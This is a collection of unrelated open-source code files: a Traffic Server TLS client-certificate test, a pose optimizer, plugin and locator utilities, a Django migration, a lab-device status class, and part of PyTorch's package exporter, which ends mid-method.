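# seq2seq call consumes the prompt:
#
#   p = generate_prompt("The dog barked.", "English", "en", "Spanish", "es")
#   raw = translate_fn(p)                 # hypothetical model call
#   translation = parse_inference(raw)    # text before the first ========== / ---------- marker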
|
tests/gold_tests/tls/tls_client_cert_override_plugin.test.py
|
cmcfarlen/trafficserver
| 1,351 |
101163
|
<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
Test.Summary = '''
Test conf_remap to specify different client certificates to offer to the origin. Loading certs/keys via plugin.
'''
ts = Test.MakeATSProcess("ts", command="traffic_manager", select_ports=True)
cafile = "{0}/signer.pem".format(Test.RunDirectory)
cafile2 = "{0}/signer2.pem".format(Test.RunDirectory)
server = Test.MakeOriginServer("server",
ssl=True,
options={"--clientCA": cafile,
"--clientverify": ""},
clientcert="{0}/signed-foo.pem".format(Test.RunDirectory),
clientkey="{0}/signed-foo.key".format(Test.RunDirectory))
server2 = Test.MakeOriginServer("server2",
ssl=True,
options={"--clientCA": cafile2,
"--clientverify": ""},
clientcert="{0}/signed2-bar.pem".format(Test.RunDirectory),
clientkey="{0}/signed-bar.key".format(Test.RunDirectory))
server3 = Test.MakeOriginServer("server3")
server.Setup.Copy("ssl/signer.pem")
server.Setup.Copy("ssl/signer2.pem")
server.Setup.Copy("ssl/signed-foo.pem")
server.Setup.Copy("ssl/signed-foo.key")
server.Setup.Copy("ssl/signed2-foo.pem")
server.Setup.Copy("ssl/signed2-bar.pem")
server.Setup.Copy("ssl/signed-bar.key")
server2.Setup.Copy("ssl/signer.pem")
server2.Setup.Copy("ssl/signer2.pem")
server2.Setup.Copy("ssl/signed-foo.pem")
server2.Setup.Copy("ssl/signed-foo.key")
server2.Setup.Copy("ssl/signed2-foo.pem")
server2.Setup.Copy("ssl/signed2-bar.pem")
server2.Setup.Copy("ssl/signed-bar.key")
request_header = {"headers": "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {
"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\nCache-Control: no-cache\r\n\r\n",
"timestamp": "1469733493.993",
"body": ""}
server.addResponse("sessionlog.json", request_header, response_header)
request_header = {"headers": "GET / HTTP/1.1\r\nHost: bar.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {
"headers": "HTTP/1.1 200 OK\r\nCache-Control: no-cache\r\nConnection: close\r\n\r\n",
"timestamp": "1469733493.993",
"body": ""}
server.addResponse("sessionlog.json", request_header, response_header)
ts.addSSLfile("ssl/server.pem")
ts.addSSLfile("ssl/server.key")
ts.addSSLfile("ssl/signed-foo.pem")
ts.addSSLfile("ssl/signed-foo.key")
ts.addSSLfile("ssl/signed2-foo.pem")
ts.addSSLfile("ssl/signed-bar.pem")
ts.addSSLfile("ssl/signed2-bar.pem")
ts.addSSLfile("ssl/signed-bar.key")
ts.Disk.sni_yaml.AddLine('sni:')
ts.Disk.sni_yaml.AddLine('- fqdn: random')
ts.Disk.sni_yaml.AddLine(' verify_server_properties: NONE')
snipath = ts.Disk.sni_yaml.AbsPath
Test.PrepareTestPlugin(os.path.join(Test.Variables.AtsTestPluginsDir, 'ssl_secret_load_test.so'), ts)
shortdir = ts.Variables.SSLDir[0:ts.Variables.SSLDir.rfind("/")]
ts.Disk.records_config.update({
'proxy.config.ssl.server.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.server.private_key.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.client.verify.server.policy': 'PERMISSIVE',
'proxy.config.ssl.client.cert.path': '{0}'.format(shortdir),
'proxy.config.ssl.client.cert.filename': 'signed-foo.pem',
'proxy.config.ssl.client.private_key.path': '{0}'.format(shortdir),
'proxy.config.ssl.client.private_key.filename': 'signed-foo.key',
'proxy.config.exec_thread.autoconfig.scale': 1.0,
'proxy.config.url_remap.pristine_host_hdr': 1,
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'ssl_secret_load|http|ssl',
})
ts.Disk.ssl_multicert_config.AddLine(
'dest_ip=* ssl_cert_name=server.pem ssl_key_name=server.key'
)
ts.Disk.remap_config.AddLine(
'map /case1 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server.Variables.SSL_Port,
"signed-foo.pem",
"signed-foo.key"))
ts.Disk.remap_config.AddLine(
'map /badcase1 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server.Variables.SSL_Port,
"signed2-foo.pem",
"signed-foo.key"))
ts.Disk.remap_config.AddLine(
'map /case2 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server2.Variables.SSL_Port,
"signed2-foo.pem",
"signed-foo.key"))
ts.Disk.remap_config.AddLine(
'map /badcase2 https://127.0.0.1:{0}/ @plugin=conf_remap.so @pparam=proxy.config.ssl.client.cert.filename={1} plugin=conf_remap.so @pparam=proxy.config.ssl.client.private_key.filename={2}'.format(
server2.Variables.SSL_Port,
"signed-foo.pem",
"signed-foo.key"))
# Should succeed
tr = Test.AddTestRun("Connect with correct client cert to first server")
tr.Processes.Default.StartBefore(Test.Processes.ts)
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(server2)
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
tr.StillRunningAfter = server2
tr.Processes.Default.Command = "curl -H host:example.com http://127.0.0.1:{0}/case1".format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
# Should fail
trfail = Test.AddTestRun("Connect with bad client cert to first server")
trfail.StillRunningAfter = ts
trfail.StillRunningAfter = server
trfail.StillRunningAfter = server2
trfail.Processes.Default.Command = 'curl -H host:example.com http://127.0.0.1:{0}/badcase1'.format(ts.Variables.port)
trfail.Processes.Default.ReturnCode = 0
trfail.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Check response")
# Should succeed
trbar = Test.AddTestRun("Connect with correct client cert to second server")
trbar.StillRunningAfter = ts
trbar.StillRunningAfter = server
trbar.StillRunningAfter = server2
trbar.Processes.Default.Command = "curl -H host:bar.com http://127.0.0.1:{0}/case2".format(ts.Variables.port)
trbar.Processes.Default.ReturnCode = 0
trbar.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
# Should fail
trbarfail = Test.AddTestRun("Connect with bad client cert to second server")
trbarfail.StillRunningAfter = ts
trbarfail.StillRunningAfter = server
trbarfail.StillRunningAfter = server2
trbarfail.Processes.Default.Command = 'curl -H host:bar.com http://127.0.0.1:{0}/badcase2'.format(ts.Variables.port)
trbarfail.Processes.Default.ReturnCode = 0
trbarfail.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Check response")
# Test the case of updating certificate contents without changing file name.
trupdate = Test.AddTestRun("Update client cert file in place")
trupdate.StillRunningAfter = ts
trupdate.StillRunningAfter = server
trupdate.StillRunningAfter = server2
# in the config/ssl directory for records.config
trupdate.Setup.CopyAs("ssl/signed-foo.pem", ".", "{0}/signed2-foo.pem".format(ts.Variables.SSLDir))
trupdate.Processes.Default.Command = 'traffic_ctl config set proxy.config.ssl.client.cert.path {0}/; touch {1}'.format(
shortdir, snipath)
# Need to copy over the environment so traffic_ctl knows where to find the unix domain socket
trupdate.Processes.Default.Env = ts.Env
trupdate.Processes.Default.ReturnCode = 0
tr2reload = Test.AddTestRun("Reload config")
tr2reload.StillRunningAfter = ts
tr2reload.StillRunningAfter = server
tr2reload.StillRunningAfter = server2
tr2reload.Processes.Default.Command = 'traffic_ctl config reload'
# Need to copy over the environment so traffic_ctl knows where to find the unix domain socket
tr2reload.Processes.Default.Env = ts.Env
tr2reload.Processes.Default.ReturnCode = 0
tr3bar = Test.AddTestRun("Make request with other foo. badcase1 should now work")
# Wait for the reload to complete
tr3bar.Processes.Default.StartBefore(server3, ready=When.FileContains(ts.Disk.diags_log.Name, 'sni.yaml finished loading', 3))
tr3bar.StillRunningAfter = ts
tr3bar.StillRunningAfter = server
tr3bar.StillRunningAfter = server2
tr3bar.Processes.Default.Command = 'curl -H host:foo.com http://127.0.0.1:{0}/badcase1'.format(ts.Variables.port)
tr3bar.Processes.Default.ReturnCode = 0
tr3bar.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
# Test the hot-reload feature. Update the cert file in place and wait a bit. Should update without a reload.
trupdate = Test.AddTestRun("Update signed-foo cert file in place")
trupdate.StillRunningAfter = ts
trupdate.StillRunningAfter = server
trupdate.Setup.CopyAs("ssl/signed2-foo.pem", ".", "{0}/signed-foo.pem".format(ts.Variables.SSLDir))
# For some reason the Setup.CopyAs does not change the modification time, so we touch
trupdate.Processes.Default.Command = 'touch {0}/signed-foo.pem {0}/signed-foo.key'.format(ts.Variables.SSLDir)
# Need to copy over the environment so traffic_ctl knows where to find the unix domain socket
trupdate.Processes.Default.Env = ts.Env
trupdate.Processes.Default.ReturnCode = 0
# The plugin polls every 3 seconds, so wait 4 seconds and test again.
# case1 should fail
# badcase1 should succeed
tr = Test.AddTestRun("Retest case1")
tr.DelayStart = 4
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = server2
tr.StillRunningAfter = ts
tr.Processes.Default.Command = "curl -H host:example.com http://127.0.0.1:{0}/case1".format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Check response")
tr = Test.AddTestRun("Retest badcase1")
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = server2
tr.StillRunningAfter = ts
tr.Processes.Default.Command = "curl -H host:example.com http://127.0.0.1:{0}/badcase1".format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Check response")
|
pixloc/pixlib/models/base_optimizer.py
|
jmorlana/pixloc
| 457 |
101183
|
<filename>pixloc/pixlib/models/base_optimizer.py
"""
Implements a simple differentiable optimizer based on Levenberg-Marquardt
with a constant, scalar damping factor and a fixed number of iterations.
"""
import logging
from typing import Tuple, Dict, Optional
import torch
from torch import Tensor
from .base_model import BaseModel
from .utils import masked_mean
from ..geometry import Camera, Pose
from ..geometry.optimization import optimizer_step
from ..geometry.interpolation import Interpolator
from ..geometry.costs import DirectAbsoluteCost
from ..geometry import losses # noqa
from ...utils.tools import torchify
logger = logging.getLogger(__name__)
class BaseOptimizer(BaseModel):
default_conf = dict(
num_iters=100,
loss_fn='squared_loss',
jacobi_scaling=False,
normalize_features=False,
lambda_=0, # Gauss-Newton
interpolation=dict(
mode='linear',
pad=4,
),
grad_stop_criteria=1e-4,
dt_stop_criteria=5e-3, # in meters
dR_stop_criteria=5e-2, # in degrees
# deprecated entries
sqrt_diag_damping=False,
bound_confidence=True,
no_conditions=True,
verbose=False,
)
logging_fn = None
def _init(self, conf):
self.loss_fn = eval('losses.' + conf.loss_fn)
self.interpolator = Interpolator(**conf.interpolation)
self.cost_fn = DirectAbsoluteCost(self.interpolator,
normalize=conf.normalize_features)
assert conf.lambda_ >= 0.
# deprecated entries
assert not conf.sqrt_diag_damping
assert conf.bound_confidence
assert conf.no_conditions
assert not conf.verbose
def log(self, **args):
if self.logging_fn is not None:
self.logging_fn(**args)
def early_stop(self, **args):
stop = False
if not self.training and (args['i'] % 10) == 0:
T_delta, grad = args['T_delta'], args['grad']
grad_norm = torch.norm(grad.detach(), dim=-1)
small_grad = grad_norm < self.conf.grad_stop_criteria
dR, dt = T_delta.magnitude()
small_step = ((dt < self.conf.dt_stop_criteria)
& (dR < self.conf.dR_stop_criteria))
if torch.all(small_step | small_grad):
stop = True
return stop
def J_scaling(self, J: Tensor, J_scaling: Tensor, valid: Tensor):
if J_scaling is None:
J_norm = torch.norm(J.detach(), p=2, dim=(-2))
J_norm = masked_mean(J_norm, valid[..., None], -2)
J_scaling = 1 / (1 + J_norm)
J = J * J_scaling[..., None, None, :]
return J, J_scaling
def build_system(self, J: Tensor, res: Tensor, weights: Tensor):
grad = torch.einsum('...ndi,...nd->...ni', J, res) # ... x N x 6
grad = weights[..., None] * grad
grad = grad.sum(-2) # ... x 6
Hess = torch.einsum('...ijk,...ijl->...ikl', J, J) # ... x N x 6 x 6
Hess = weights[..., None, None] * Hess
        Hess = Hess.sum(-3)  # ... x 6 x 6
return grad, Hess
def _forward(self, data: Dict):
return self._run(
data['p3D'], data['F_ref'], data['F_q'], data['T_init'],
data['cam_q'], data['mask'], data.get('W_ref_q'))
@torchify
def run(self, *args, **kwargs):
return self._run(*args, **kwargs)
def _run(self, p3D: Tensor, F_ref: Tensor, F_query: Tensor,
T_init: Pose, camera: Camera, mask: Optional[Tensor] = None,
W_ref_query: Optional[Tuple[Tensor, Tensor]] = None):
T = T_init
J_scaling = None
if self.conf.normalize_features:
F_ref = torch.nn.functional.normalize(F_ref, dim=-1)
args = (camera, p3D, F_ref, F_query, W_ref_query)
failed = torch.full(T.shape, False, dtype=torch.bool, device=T.device)
for i in range(self.conf.num_iters):
res, valid, w_unc, _, J = self.cost_fn.residual_jacobian(T, *args)
if mask is not None:
valid &= mask
failed = failed | (valid.long().sum(-1) < 10) # too few points
# compute the cost and aggregate the weights
cost = (res**2).sum(-1)
cost, w_loss, _ = self.loss_fn(cost)
weights = w_loss * valid.float()
if w_unc is not None:
weights *= w_unc
if self.conf.jacobi_scaling:
J, J_scaling = self.J_scaling(J, J_scaling, valid)
# solve the linear system
g, H = self.build_system(J, res, weights)
delta = optimizer_step(g, H, self.conf.lambda_, mask=~failed)
if self.conf.jacobi_scaling:
delta = delta * J_scaling
# compute the pose update
dt, dw = delta.split([3, 3], dim=-1)
T_delta = Pose.from_aa(dw, dt)
T = T_delta @ T
self.log(i=i, T_init=T_init, T=T, T_delta=T_delta, cost=cost,
valid=valid, w_unc=w_unc, w_loss=w_loss, H=H, J=J)
if self.early_stop(i=i, T_delta=T_delta, grad=g, cost=cost):
break
if failed.any():
logger.debug('One batch element had too few valid points.')
return T, failed
def loss(self, pred, data):
raise NotImplementedError
def metrics(self, pred, data):
raise NotImplementedError
|
aztk/spark/models/plugins/jupyter/configuration.py
|
Geims83/aztk
| 161 |
101191
|
import os
from aztk.models.plugins.plugin_configuration import PluginConfiguration, PluginPort, PluginTargetRole
from aztk.models.plugins.plugin_file import PluginFile
dir_path = os.path.dirname(os.path.realpath(__file__))
def JupyterPlugin():
return PluginConfiguration(
name="jupyter",
ports=[PluginPort(internal=8888, public=True)],
target_role=PluginTargetRole.All,
execute="jupyter.sh",
files=[PluginFile("jupyter.sh", os.path.join(dir_path, "jupyter.sh"))],
)
|
packages/core/src/RPA/core/locators/literal.py
|
amisol/rpaframework
| 518 |
101206
|
<filename>packages/core/src/RPA/core/locators/literal.py
from typing import Union
from RPA.core.locators import LocatorsDatabase, Locator, TYPES
LocatorType = Union[str, Locator]
def _unquote(text):
if text.startswith('"') and text.endswith('"'):
text = text[1:-1]
return text
def parse(locator: LocatorType) -> Locator:
"""Parse locator string literal into a ``Locator`` instance.
For example: "image:path/to/image.png" -> ImageLocator(path="path/to/image-png")
"""
if isinstance(locator, Locator):
return locator
try:
typename, _, value = str(locator).partition(":")
except ValueError as err:
raise ValueError(f"Invalid locator format: {locator}") from err
if not value:
typename, value = "alias", typename
typename = typename.strip().lower()
if typename == "alias":
return LocatorsDatabase.load_by_name(_unquote(value))
else:
klass = TYPES.get(typename)
if not klass:
raise ValueError(f"Unknown locator type: {typename}")
args = [_unquote(arg) for arg in value.split(",")]
return klass(*args)
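# Illustrative behaviour (not in the original module); concrete keys depend on TYPES:
#   parse("my_locator")                  -> alias lookup in LocatorsDatabase
#   parse('alias:"My Locator"')          -> alias lookup with the surrounding quotes stripped
#   parse("image:path/to/image.png")     -> TYPES["image"]("path/to/image.png"),
#                                           assuming an "image" entry exists in TYPES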
|
tock/projects/migrations/0026_auto_20200519_1616.py
|
elisoncrum/tock
| 134 |
101211
|
# Generated by Django 2.2.12 on 2020-05-19 20:16
from django.db import migrations
def populate_project_organizations(apps, schema_editor):
Project = apps.get_model('projects', 'Project')
Organization = apps.get_model('organizations', 'Organization')
# assignment of existing projects to orgs based on project name based on
# discussions w/ <NAME> (2020-05-20)
org_project_mapping = {
'18F': ['18F', 'TTS Acq'],
'CoE': ['CoE'],
'cloud.gov': ['cloud.gov'],
'Login.gov': ['Login.gov'],
'OA': ['TTS OA'],
'PIF': ['PIF']
}
for org_name in org_project_mapping.keys():
try:
org = Organization.objects.filter(name=org_name)[0]
for project_name_start in org_project_mapping[org_name]:
Project.objects.filter(name__istartswith=project_name_start).update(organization=org)
except IndexError:
pass
class Migration(migrations.Migration):
dependencies = [
('projects', '0025_auto_20200303_1821'),
('organizations', '0006_unit_initial_data')
]
operations = [
migrations.RunPython(populate_project_organizations),
]
|
api/src/opentrons/hardware_control/modules/lid_temp_status.py
|
anuwrag/opentrons
| 235 |
101221
|
<reponame>anuwrag/opentrons<gh_stars>100-1000
from opentrons.drivers.types import Temperature
from opentrons.hardware_control.modules.types import TemperatureStatus
class LidTemperatureStatus:
"""A wrapper for the lid temperature status."""
TEMP_THRESHOLD = 0.3
"""The threshold under which the difference between target and temperature
is considered `holding`."""
def __init__(self) -> None:
"""Construct."""
self._status = TemperatureStatus.ERROR
@property
def status(self) -> TemperatureStatus:
"""Return the current status."""
return self._status
def update(self, temperature: Temperature) -> TemperatureStatus:
"""Update the status based on the temperature."""
if temperature.target is None:
status = TemperatureStatus.IDLE
else:
diff = temperature.target - temperature.current
if abs(diff) < self.TEMP_THRESHOLD:
status = TemperatureStatus.HOLDING
elif diff < 0:
# TC lid can't actively cool
status = TemperatureStatus.IDLE
else:
status = TemperatureStatus.HEATING
self._status = status
return self._status
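# Illustrative transitions implemented above (values only; the exact Temperature
# constructor lives in opentrons.drivers.types and is not shown here):
#   target is None                    -> IDLE     (nothing to hold)
#   |target - current| < 0.3          -> HOLDING
#   target < current (lid too hot)    -> IDLE     (the TC lid cannot actively cool)
#   target > current                  -> HEATING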
|
tests/helpers.py
|
achalpatel/thenewboston-python
| 122 |
101227
|
<reponame>achalpatel/thenewboston-python
from thenewboston.accounts.manage import create_account
from thenewboston.verify_keys.verify_key import encode_verify_key
def random_encoded_account_number():
signing_key, account_number = create_account()
return encode_verify_key(verify_key=account_number)
|
torch/_package/exporter.py
|
jsun94/nimble
| 206 |
101345
|
import torch
from torch.serialization import normalize_storage_type, location_tag, _should_read_directly
import io
import pickle
import pickletools
from .find_file_dependencies import find_files_source_depends_on
from ._custom_import_pickler import CustomImportPickler
from ._importlib import _normalize_path
import types
import importlib
from typing import List, Any, Callable, Dict, Tuple
from distutils.sysconfig import get_python_lib
from pathlib import Path
import linecache
import sys
from tempfile import NamedTemporaryFile
class PackageExporter:
""" Exporters allow you to write packages of code, pickled python data, and
arbitrary binary and text resources into a self-contained package.
Imports can load this code in a hermetic way, such that code is loaded
from the package rather than the normal python import system. This allows
for the packaging of PyTorch model code and data so that it can be run
on a server or used in the future for transfer learning.
The code contained in packages is copied file-by-file from the original
source when it is created, and the file format is a specially organized
zip file. Future users of the package can unzip the package, and edit the code
in order to perform custom modifications to it.
The importer for packages ensures that code in the module can only be loaded from
within the package, except for modules explicitly listed as external using :method:`extern_module`.
The file `extern_modules` in the zip archive lists all the modules that a package externally depends on.
This prevents "implicit" dependencies where the package runs locally because it is importing
a locally-installed package, but then fails when the package is copied to another machine.
Dependencies
------------
When source code is added to the package, the exporter optionally can scan it
for further code dependencies (`dependencies=True`). It looks for import statements,
resolves relative references to qualified module names, and calls :method:`require_module`
    on each module it finds, recursively resolving dependencies.
"""
importers: List[Callable[[str], Any]]
""" A list of functions that will be called in order to find the module assocated
with module names referenced by other modules or by pickled objects. Initialized to
    `[importlib.import_module]` by default. When pickling code or objects that were loaded
    from an imported package, that importer's `import_module` should be put into the importer list.
When a name conflict occurs between importers, the first importer in the list takes precedence,
    and only objects that refer to this first importer's classes can be saved
"""
def __init__(self, filename: str, verbose: bool = True):
"""
Create an exporter.
Args:
filename: e.g. my_package.zip
verbose: Print information about dependency resolution to stdout.
Useful for tracking down why certain files get included.
"""
self.zip_file = torch._C.PyTorchFileWriter(filename)
self.serialized_storages : Dict[str, Any] = {}
self.external : List[str] = []
self.provided : Dict[str, bool] = {}
self.verbose = verbose
self.importers = [importlib.import_module]
self.debug_deps : List[Tuple[str, str]] = []
def save_source_file(self, module_name: str, file_or_directory: str, dependencies=True):
"""Adds the local file system `file_or_directory` to the source package to provide the code
for `module_name`.
Args:
module_name (str): e.g. `my_package.my_subpackage`, code will be saved to provide code for this package.
file_or_directory (str): the path to a file or directory of code. When a directory, all python files in the directory
are recursively copied using :meth:`save_source_file`. If a file is named `__init__.py`, the code is treated
as a package.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
"""
path = Path(file_or_directory)
if path.is_dir():
to_save = [] # list of tuples with arguments to save_source_string
module_path = module_name.replace('.', '/')
for filename in path.glob('**/*.py'):
relative_path = filename.relative_to(path).as_posix()
archivename = module_path + '/' + relative_path
if filename.is_dir():
self.provided[archivename] = True
else:
submodule_name = None
if filename.name == '__init__.py':
submodule_name = archivename[:-len('/__init__.py')].replace('/', '.')
is_package = True
else:
submodule_name = archivename[:-len('.py')].replace('/', '.')
is_package = False
self.provided[submodule_name] = True
# we delay the call to save_source_string so that we record all the source files
# being provided by this directory structure _before_ attempting to resolve the dependencies
# on the source. This makes sure we don't try to copy over modules that will just get
# overwritten by this directory blob
to_save.append((submodule_name, _read_file(str(filename)), is_package, dependencies, str(filename)))
for item in to_save:
self.save_source_string(*item)
else:
is_package = path.name == '__init__.py'
self.save_source_string(module_name, _read_file(file_or_directory), is_package, dependencies, file_or_directory)
def save_source_string(self, module_name: str, src: str, is_package: bool = False,
dependencies: bool = True, orig_file_name: str = None):
"""Adds `src` as the source code for `module_name` in the exported package.
Args:
module_name (str): e.g. `my_package.my_subpackage`, code will be saved to provide code for this package.
src (str): The python source code to save for this package
is_package (bool, optional): If True, this module is treated as a package. Packages are allowed to have submodules
(e.g. my_package.my_subpackage.my_subsubpackage), and resources can be saved inside them. Defaults to False.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
orig_file_name (str, optional): If present, used in logging to identify where the source came from. Defaults to None.
"""
self.provided[module_name] = True
extension = '/__init__.py' if is_package else '.py'
filename = module_name.replace('.', '/') + extension
self._write(filename, src)
if dependencies:
package = module_name if is_package else module_name.rsplit('.', maxsplit=1)[0]
dep_pairs = find_files_source_depends_on(src, package)
dep_list = {}
for dep_module_name, dep_module_obj in dep_pairs:
# handle the case where someone did something like `from pack import sub`
# where `sub` is a submodule. In this case we don't have to save pack, just sub.
# this ensures we don't pick up additional dependencies on pack.
# However, in the case where `sub` is not a submodule but an object, then we do have
# to save pack.
if dep_module_obj is not None:
possible_submodule = f'{dep_module_name}.{dep_module_obj}'
if self._module_exists(possible_submodule):
dep_list[possible_submodule] = True
# we don't need to save `pack`
continue
if self._module_exists(dep_module_name):
dep_list[dep_module_name] = True
for dep in dep_list.keys():
self.debug_deps.append((module_name, dep))
if self.verbose:
dep_str = ''.join(f' {dep}\n' for dep in dep_list.keys())
file_info = f'(from file {orig_file_name}) ' if orig_file_name is not None else ''
print(f"{module_name} {file_info}depends on:\n{dep_str}\n")
for dep in dep_list.keys():
self.require_module_if_not_provided(dep)
def _module_exists(self, module_name: str) -> bool:
try:
self._import_module(module_name)
return True
except Exception:
return False
def _write_dep_graph(self, failing_module=None, output_file=None):
depended_on : Dict[str, List[str]] = {}
for f, t in self.debug_deps:
if t not in depended_on:
depended_on[t] = []
if f not in depended_on:
depended_on[f] = []
depended_on[t].append(f)
level : Dict[str, int] = {}
def visit(x: str):
if x in level:
return level[x]
level[x] = 0
for e in depended_on[x]:
level[x] = max(level[x], visit(e) + 1)
return level[x]
for x in depended_on.keys():
visit(x)
nodes = []
node_to_id = {}
n = 0
for ft in self.debug_deps:
for e in ft:
if e not in node_to_id:
node_to_id[e] = n
extra = ''
if e == failing_module:
extra = ", color: 'red'"
nodes.append(f" {{id: {n}, label: '{e}', level: {level[e]}, shape: 'box'{extra}}},\n")
n += 1
edges = []
for f, t in self.debug_deps:
fn, tn = node_to_id[f], node_to_id[t]
edges.append(f" {{from: {fn}, to: {tn}, arrows: 'to'}},\n")
nodes_s, edges_s = ''.join(nodes), ''.join(edges)
template = f"""\
<html>
<head>
<script type="text/javascript" src="https://almende.github.io/vis/dist/vis.js"></script>
<link href="https://almende.github.io/vis/dist/vis.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="mynetwork"></div>
<script type="text/javascript">
var nodes = new vis.DataSet([
{nodes_s}
]);
var edges = new vis.DataSet([
{edges_s}
]);
var options = {{
layout: {{
hierarchical: {{
direction: "LR",
levelSeparation: 400,
}},
}},
}};
// create a network
var container = document.getElementById('mynetwork');
var network = new vis.Network(container, {{nodes: nodes, edges: edges}}, options);
</script>
</body>
</html>
"""
if output_file:
output_file.write(template)
return None
with NamedTemporaryFile(mode='w', suffix='.html', delete=False) as tf:
tf.write(template)
return tf.name
def _get_source_of_module(self, module: types.ModuleType) -> str:
filename = getattr(module, '__file__', None)
result = None if filename is None or not filename.endswith('.py') else linecache.getlines(filename, module.__dict__)
if result is None:
extra = ''
if self.verbose:
extra = f' See the dependency graph for more info: {self._write_dep_graph(module.__name__)}'
raise ValueError(f'cannot save source for module "{module.__name__}" because '
f'its source file "{filename}" could not be found.{extra}')
return ''.join(result)
def require_module_if_not_provided(self, module_name: str, dependencies=True):
if self._module_is_already_provided(module_name):
return
self.require_module(module_name, dependencies)
def require_module(self, module_name: str, dependencies=True):
"""This is called by dependencies resolution when it finds that something in the package
depends on the module and it is not already present. It then decides how to provide that module.
The default resolution rules will mark the module as extern if it is part of the standard library,
and call `save_module` otherwise. Clients can subclass this object
and override this method to provide other behavior, such as automatically mocking out a whole class
of modules"""
root_name = module_name.split('.', maxsplit=1)[0]
if self._can_implicitly_extern(root_name):
if self.verbose:
print(f'implicitly adding {root_name} to external modules '
f'since it is part of the standard library and is a dependency.')
self.extern_module(root_name)
return
self.save_module(module_name, dependencies)
def save_module(self, module_name: str, dependencies=True):
"""Save the code for `module_name` into the package. Code for the module is resolved using the `importers` path to find the
module object, and then using its `__file__` attribute to find the source code.
Args:
module_name (str): e.g. `my_package.my_subpackage`, code will be saved to provide code for this package.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
"""
module = self._import_module(module_name)
source = self._get_source_of_module(module)
self.save_source_string(module_name, source, hasattr(module, '__path__'), dependencies, module.__file__)
def _import_module(self, module_name):
last_err = None
for import_module in self.importers:
try:
return import_module(module_name)
except ModuleNotFoundError as err:
last_err = err
if last_err is not None:
raise last_err
else:
raise ModuleNotFoundError(module_name)
def _create_pickler(self, data_buf):
if self.importers == [importlib.import_module]:
# if we are using the normal import library system, then
# we can use the C implementation of pickle which is faster
return pickle.Pickler(data_buf, protocol=3)
else:
return CustomImportPickler(self._import_module, data_buf, protocol=3)
def save_pickle(self, package: str, resource: str, obj: Any, dependencies: bool = True):
"""Save a python object to the archive using pickle. Equivalent to :func:`torch.save` but saving into
the archive rather than a stand-alone file. Standard pickle does not save the code, only the objects.
If `dependencies` is true, this method will also scan the pickled objects for which modules are required
to reconstruct them and save the relevant code.
To be able to save an object where `type(obj).__name__` is `my_module.MyObject`,
`my_module.MyObject` must resolve to the class of the object according to the `importer` order. When saving objects that
have previously been packaged, the importer's `import_module` method will need to be present in the `importer` list
for this to work.
Args:
package (str): The name of the module package this resource should go in (e.g. "my_package.my_subpackage")
resource (str): A unique name for the resource, used to identify it when loading.
obj (Any): The object to save, must be picklable.
dependencies (bool, optional): If True, we scan the source for dependencies (see :ref:`Dependencies`).
"""
filename = self._filename(package, resource)
# Write the pickle data for `obj`
data_buf = io.BytesIO()
pickler = self._create_pickler(data_buf)
pickler.persistent_id = self._persistent_id
pickler.dump(obj)
data_value = data_buf.getvalue()
if dependencies:
all_dependencies = []
for opcode, arg, pos in pickletools.genops(data_value):
if opcode.name == 'GLOBAL': # a global reference
assert isinstance(arg, str)
module, field = arg.split(' ')
if module not in all_dependencies:
all_dependencies.append(module)
for dep in all_dependencies:
self.debug_deps.append((package + '.' + resource, dep))
if self.verbose:
dep_string = ''.join(f' {dep}\n' for dep in all_dependencies)
print(f"{resource} depends on:\n{dep_string}\n")
for module_name in all_dependencies:
self.require_module_if_not_provided(module_name)
self._write(filename, data_value)
def save_text(self, package: str, resource: str, text: str):
"""Save text data to the package
Args:
package (str): The name of the module package this resource should go in (e.g. "my_package.my_subpackage")
resource (str): A unique name for the resource, used to identify it when loading.
text (str): The contents to save
"""
return self.save_binary(package, resource, text.encode('utf-8'))
def save_binary(self, package, resource, binary: bytes):
"""Save raw bytes to the package.
Args:
